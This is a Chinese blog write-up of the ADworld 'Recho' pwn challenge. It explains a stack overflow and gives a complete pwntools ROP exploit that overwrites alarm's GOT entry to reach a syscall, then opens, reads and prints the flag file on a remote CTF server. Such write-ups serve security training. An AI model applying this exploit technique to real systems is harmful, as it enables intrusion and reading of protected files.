ADworld pwn wp - Recho

最新推荐文章于 2022-01-26 14:46:42 发布
最新推荐文章于 2022-01-26 14:46:42 发布
阅读量179 收藏 2
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/118273919
版权

在这里插入图片描述

在这里插入图片描述

可以任意长度输入, 存在溢出, 不过溢出之后再次输入还是继续执行, 无法退出循环就不能劫持程序流
这里用到pwntools的一个函数, 用来结束输入流, 从而结束循环

def shutdown(self, direction = "send"):
        """shutdown(direction = "send")
        Closes the tube for futher reading or writing depending on `direction`.
        Arguments:
          direction(str): Which direction to close; "in", "read" or "recv"
            closes the tube in the ingoing direction, "out", "write" or "send"
            closes it in the outgoing direction.
        Returns:
          :const:`None`
        """

但是关闭流就不能二次利用漏洞, 所以需要一次利用拿到flag, 想到可以通过open, 读取文件flag, 然后输出

int f = open("flag", "r+");
read(f, buf, 128);
printf("%s", buf);

在这里插入图片描述
在这里插入图片描述

用add_rdi_al来设置alarm的got表项为alarm + 5 == syscall
用pwndbg的vmmap找到可读写的段用来充当buf, 为了不影响到bss段, 可以选择0x601100开始写入
在这里插入图片描述在这里插入图片描述

from pwn import *
from pwnlib.util.cyclic import cyclic

sel = 1
filename = "./recho"
URL, PORT = "111.200.241.244", 49730  
io = process(filename) if sel == 0 else remote(URL, PORT)

elf = ELF(filename)
alarm_got = elf.got['alarm']
alarm_plt = elf.plt['alarm']
read_plt = elf.plt['read']
printf_plt = elf.plt['printf']
flag_addr = next(elf.search(b'flag'))
pad = 0x30 + 8
buf_addr = 0x601100
pop_rdi_addr = 0x00000000004008a3
pop_rdx_addr = 0x00000000004006fe
pop_rsi_r15_addr = 0x00000000004008a1
pop_rax_addr = 0x00000000004006fc
add_rdi_al_addr = 0x000000000040070d

payload = cyclic(pad) + p64(pop_rdi_addr) + p64(alarm_got) + p64(pop_rax_addr) + p64(5) + p64(add_rdi_al_addr)
payload += p64(pop_rdi_addr) + p64(flag_addr) + p64(pop_rsi_r15_addr) + p64(0) + p64(0) + p64(pop_rax_addr) + p64(2) + p64(alarm_plt)
payload += p64(pop_rdi_addr) + p64(3) + p64(pop_rsi_r15_addr) + p64(buf_addr) + p64(0) + p64(pop_rdx_addr) + p64(0x80) + p64(read_plt)
payload += p64(pop_rdi_addr) + p64(buf_addr) + p64(printf_plt)
payload.ljust(0x200, b'\x90')

io.sendlineafter("server!\n", str(0x200))
io.sendline(payload)
io.shutdown('send')
io.interactive()

在这里插入图片描述

fa1c4
关注
专栏目录
adworld攻防世界-pwn-新手区-wp
令则
03-05 1186
adworld-pwn-新手区 tcl 到现在才算是正经昨晚攻防世界的pwn新手区, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
pwn 继续Recho
doudoudedi
09-28 671
好久没有更新博客了师傅们的评论都看了emem萌新会加油的~~ 这是一道xctf上的pwn题Rcho 主函数的逻辑很简单就是`// local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { char ...
攻防世界 Pwn Recho
MrTreebook的博客
12-18 667
攻防世界 Pwn Recho1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 3.IDA分析 可以看到这个while是死循环 所以要学会使用pwntools的shutdown功能来退出循环 但是循环退出之后就不能再进入了 接下来要看一下漏洞在哪 这个题目有个明显后门,在data段发现有flag。可以将它read到bss段中,再通过write输出出来 在gdb动态调试时,分析alarm,发现有 有syscall系统调用 漏洞利用思路如下:
XCTF Recho
weixin_44164182的博客
01-02 246
XCTF Recho ROP构造linux系统调用 from pwn import * import time from ctypes import * # context.update(log_level='debug', timeout='2') context.log_level = 'debug' context.timeout = 2 # r = process('./Recho') r = remote('220.249.52.134', 54741) elf = ELF('./Recho'
ADworld pwn wp - shadow-400
fa1c4的blog
09-13 158
前言 整数溢出 + shadow call / ret 分析过程 int __cdecl call(int (__cdecl *a1)(void *)) { push(); push(); return a1(&ret_stub); } int __cdecl push(int a1) { _DWORD *v1; // ebx int result; // eax dword_804A048 = __readgsdword(0x20u); if ( dword_80
攻防世界进阶题Recho——知识点缝合怪
weixin_48066554的博客
09-20 1121
攻防世界进阶题Recho——知识点缝合怪 文章目录攻防世界进阶题Recho——知识点缝合怪引入初分析1、checksec2、主函数结构3、栈结构4、特殊字符串解题过程1、gadget搜集2、GOT表详情3、函数参数说明exp(详细注释) 引入 好久没有做pwn题了,手生的厉害,做道简单题练练手好了 这道题其实难度不高,属于那种开门见山把漏洞点抛出任君采撷的题,但是由于涉及的知识点较多,在ROP链构造时需要有清晰的思路,对于我这样的小白来说自然是再好不过的练习题。 初分析 1、checksec 题目拿到手上,
ADworld pwn wp - hacknote
fa1c4的blog
08-30 225
前言 攻防世界的一道pwn, UAF漏洞 https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4717&page=2 分析过程 void __cdecl __noreturn main() { int v0; // eax char buf[4]; // [esp+8h] [ebp-10h] BYREF unsigned int v2; // [esp+Ch] [ebp-Ch
ADworld pwn wp - pwn-200
fa1c4的blog
06-25 159
明显的栈溢出, 动态链接, 无libc利用, ret2libc, 板子打法, 用pwntools的DynELF模块泄露libc地址, 原理是结合puts或writes函数泄露地址, 所以有两个利用条件: 漏洞可以泄露libc地址 漏洞可以反复利用(ret 回到函数开头继续执行) write函数 头文件:#include <unistd.h> 定义函数:ssize_t write (int fd, const void * buf, size_t count); 函数说明:write(...
ADworld pwn wp - shaxian
fa1c4的blog
09-13 145
前言 fastbin attack, 劫持got表 分析过程 int __cdecl main() { int result; // eax int v1; // [esp+1Ch] [ebp-4h] alarm(0x1Eu); SetBuf(); title(); info(); while ( 2 ) { menu(); v1 = input(); if ( v1 == -1 ) return 0; switch ( v1
ADworld pwn wp - 250
fa1c4的blog
09-12 135
前言 一道非典型栈溢出题目 分析过程 int __cdecl main(int argc, const char **argv, const char **envp) { char v4; // [esp-Ch] [ebp-24h] char v5; // [esp-Ch] [ebp-24h] int v6; // [esp+Ch] [ebp-Ch] BYREF setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); p
adworld-crypto-cr2-many-time-secrets
bunner_的博客
10-21 360
题目信息没给全,看了别人的博客才发现还有一段描述 This time Fady learned from his old mistake and decided to use onetime pad as his encryption technique, but he never knew why people call it one time pad! Flag will start with ALEXCTF{. 从上面这段描述来看,Fady 使用 OTP(一次性密码本) 来加密他的文件,但是他不
adworld-crypto-onetimepad
bunner_的博客
10-25 389
有限域GF,本原多项式P GF上的加法为异或运算 GF上的减法为异或运算 GF上的乘法为移位异或,且乘法群为循环群 GF上的除法即为乘上逆元 有限域上的运算实现 拿到题目,给了三段密文和一段加密代码 af3fcc28377e7e983355096fd4f635856df82bbab61d2c50892d9ee5d913a07f 630eb4dce274d29a16f86940f2f35253477665949170ed9e8c9e828794b5543c e913db07cbe4f433c7cde.
adworld-crypto-RSA_gcd
bunner_的博客
10-21 684
给定两个不同的n的时候一定要看看n1,n2有没有最大公约数(素数),如果有,那么该最大公约数就是两者共同的p 给定两个相同的n的时候,那就要考虑共模攻击了 拿到题目,有两个文件,里面分别有n,e,c 看了一下两份文件的e相同,n不同 题目的名字是RSA_gcd,自然想到了求n1n_1n1​,n2n_2n2​的最大公约数 求出的最大公约数若为素数的话,那么它就是p,题目自然就解出来了 import gmpy2 def get_p(n1, n2): p = gmpy2.gcd(n1, n2)..
adworld.xctf-web-新手练习区刷题
BROTHERYY的博客
05-07 1057
1.View Source 根据题目,就能猜到,此处是查看页面源码,在查看的过程中发现右键不能使用了,那就用F12吧~ 2.Robots 这题是考察Robots协议,访问的时候页面是一片空白,直接输入robots.txt 在地址栏输入robots.txt会得到f1ag_1s_h3re.php,尝试直接访问这个php文件。 3.Backup 对常用的备份文件名进行测试*.php~ or ...
pwntools中fmtstr的使用
fa1c4的blog
02-01 4150
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
kali安装checksec
fa1c4的blog
01-26 3445
git clone https://github.com/slimm609/checksec.sh.git cd checksec.sh sudo ln -s checksec /usr/local/bin/checksec 如果已存在checksec,用 sudo ln -sf checksec /usr/local/bin/checksec
[Windows] CVE-2011-2005 Afd.sys 本地提权漏洞复现
fa1c4的blog
01-26 3379
前言 这是一个微软在2011.10发布的补丁中提到的系统辅助驱动程序Afd.sys存在的本地提权漏洞, 影响到Windows XP, 和Windows Server 2003系统. 漏洞成因是Microsoft Windows Ancillary Function Driver(afd.sys)驱动程序没有完善检测用户提交的数据, 攻击者可以利用该漏洞执行任意代码. 漏洞分析 漏洞利用 总结 ...
Ubuntu16.04 pip安装pwntools出错
fa1c4的blog
02-23 3060
具体出错过程 Ubuntu16.04装pip, 然后用pip装pwntools会提示pip版本过低, 按给的命令更新之后pip就崩了 解决 先卸载pip https://blog.csdn.net/qq_33976344/article/details/113991528 然后下载文件进行安装 curl "https://bootstrap.pypa.io/get-pip.py" -o "get-pip.py" python3 get-pip.py python2 get-pip.py # 提示 ERR
BUUCTF pwn wp 81 - 85
fa1c4的blog
01-08 2976
wdb_2018_2nd_easyfmt int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[100]; // [esp+8h] [ebp-70h] BYREF unsigned int v4; // [esp+6Ch] [ebp-Ch] v4 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0);
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值